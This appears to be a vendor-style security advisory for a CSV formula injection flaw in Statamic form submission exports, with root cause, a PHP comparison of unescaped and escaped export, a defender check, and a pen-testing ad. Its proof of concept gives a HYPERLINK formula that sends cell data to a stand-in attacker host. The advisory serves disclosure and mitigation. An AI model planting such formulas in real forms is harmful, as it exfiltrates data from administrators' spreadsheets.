Statamic: CSV Formula Injection in Form Submission Exports

Unauthenticated form submitters can enter spreadsheet formulas into fields that the form submission CSV export writes verbatim; they are evaluated in the spreadsheet of a Control Panel user who opens the export.

Advisory ID: TP-2026-015
Product: Statamic (Laravel-based, flat-file-first CMS)
Vulnerability type: CSV formula injection (CWE-1236)
CVE: CVE-2026-54243
CVSS 3.1: 6.1 (Medium) · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Affected versions: < 5.73.24, < 6.20.1
Fixed in: 5.73.24, 6.20.1
Vendor advisory: GHSA-h77m-qrj7-jxcw
Reported: 31 May 2026

Summary

Statamic is a Laravel-based, flat-file-first CMS. When form submissions are exported to CSV, the visitor-supplied field values are written verbatim without neutralizing the leading characters that spreadsheets treat as formula triggers (=, +, -, @). An unauthenticated submitter can therefore enter a formula into a form field that reaches the CSV file as-is. When a Control Panel user later opens the export in Excel, LibreOffice Calc, or Google Sheets, the spreadsheet evaluates the value as a formula. The vulnerability thus takes effect not in Statamic itself but in the spreadsheet of the user viewing the export. turingpoint verified the flow and reported it responsibly to the vendor.

Root cause

The form submission CSV exporter (src/Forms/Exporters/CsvExporter.php) writes values via League\Csv\Writer without registering a formula-escaping formatter (EscapeFormula). As a result, field values that begin with one of the trigger characters =, +, -, or @ reach the CSV cells unchanged. Those values come from form submitters, who are unauthenticated on publicly reachable forms. Spreadsheets interpret cell contents beginning with these characters as formulas by default, so something like =HYPERLINK(...) can be used for data exfiltration when the export is opened. Because the export is triggered and opened in the Control Panel by a privileged user, the evaluation hits their working environment.

Proof of Concept

Prerequisite is a publicly reachable Statamic form and a Control Panel user who exports the submissions to CSV:

# 1) As an unauthenticated visitor, submit a public Statamic form and put a
#    spreadsheet formula into a text field:
Field value:  =HYPERLINK("https://attacker.example/?c="&A1,"Click")

# Other leading trigger characters: =  +  -  @

# 2) A Control Panel user exports the form submissions as CSV
#    (Form > Export) and opens the file in Excel/LibreOffice/Google Sheets.

# 3) The spreadsheet evaluates the cell content as a formula:
#    =HYPERLINK exfiltrates cell data to the attacker on click,
#    other formulas may trigger further actions depending on the application.

Because the exporter does not neutralize the trigger characters, the formula remains in the CSV cell and is evaluated when the file is opened in the user’s spreadsheet.
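The following PHP script is an added example, not code from Statamic or from league/csv. It puts the two writer configurations from the root cause side by side: a League\Csv\Writer with no formatter registered, which passes submitter-controlled values through verbatim as in the affected exporter, and the same writer with EscapeFormula registered, which prefixes any cell starting with a trigger character. It also includes a check a defender can run over an existing export to list trigger-prefixed cells. The function names, header, and sample rows are constructed for this example; it assumes league/csv 9.7 or later installed via Composer.

```php
<?php
declare(strict_types=1);

// Added example, not code from Statamic or from league/csv. It shows a writer
// without a formatter (the affected exporter's behaviour) beside one with
// League\Csv\EscapeFormula registered, plus a check that lists trigger-prefixed
// cells in an existing export. Assumes league/csv 9.7+ installed via Composer;
// the function names, header and sample rows are constructed for this example.

require __DIR__ . '/vendor/autoload.php';

use League\Csv\EscapeFormula;
use League\Csv\Reader;
use League\Csv\Writer;

const HEADER = ['name', 'message'];

// Constructed submissions. Rows 1-3 carry the kind of values an unauthenticated
// visitor could type into a form field; row 4 is a legitimate phone number.
const SAMPLE_ROWS = [
    ['Alice',     '=SUM(A1:A3)'],
    ['@attacker', '+CMD()'],
    ['-1',        'plain text'],
    ['Bob',       '+49 30 123456'],
];

/** Export the way the affected exporter does: values pass through verbatim. */
function exportUnsafe(array $rows): string
{
    $writer = Writer::createFromString();
    $writer->insertOne(HEADER);
    $writer->insertAll($rows);
    return $writer->toString();
}

/** Hardened export: EscapeFormula prefixes cells starting with a trigger char. */
function exportSafe(array $rows): string
{
    $writer = Writer::createFromString();
    // Default trigger set: '=', '-', '+', '@', "\t", "\r"; default prefix: "'".
    $writer->addFormatter(new EscapeFormula());
    $writer->insertOne(HEADER);
    $writer->insertAll($rows);
    return $writer->toString();
}

/**
 * Defender-side check over an existing CSV export: returns every cell whose
 * first character is a spreadsheet formula trigger, as [row, column, value].
 */
function findFormulaCells(string $csv): array
{
    $hits = [];
    foreach (Reader::createFromString($csv)->getRecords() as $row => $record) {
        foreach ($record as $col => $cell) {
            if ($cell !== '' && str_contains("=+-@\t\r", $cell[0])) {
                $hits[] = [$row, $col, $cell];
            }
        }
    }
    return $hits;
}

$unsafe = exportUnsafe(SAMPLE_ROWS);
$safe   = exportSafe(SAMPLE_ROWS);

echo "Unsafe export:\n", $unsafe, "\n";
echo "Trigger-prefixed cells: ", count(findFormulaCells($unsafe)), "\n";
echo "Hardened export:\n", $safe, "\n";
echo "Trigger-prefixed cells: ", count(findFormulaCells($safe)), "\n";
```

Two practical notes on the hardened variant. First, the formatter acts at write time, so it protects every record the configured Writer emits, but stored submissions remain raw and any other export path needs its own handling. Second, the prefix is applied to every value that starts with a trigger character, so legitimate inputs such as the phone number or a negative number in the sample rows are also prefixed with an apostrophe; that is the accepted trade-off of this mitigation, and the check above flags those cells in the unsafe export for the same reason.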

Impact

  • Execution of spreadsheet formulas in the application of a Control Panel user who opens a CSV export.
  • Data exfiltration from the opened spreadsheet, for example via =HYPERLINK, plus further formula-triggered actions depending on the application.
  • Triggerable by unauthenticated form submitters; the effect occurs in the user’s spreadsheet, not in Statamic itself.

Is Something Like This in Your Software?

Our team found this vulnerability in the course of its work. Have your applications tested by the same specialists, with a penetration test from turingpoint.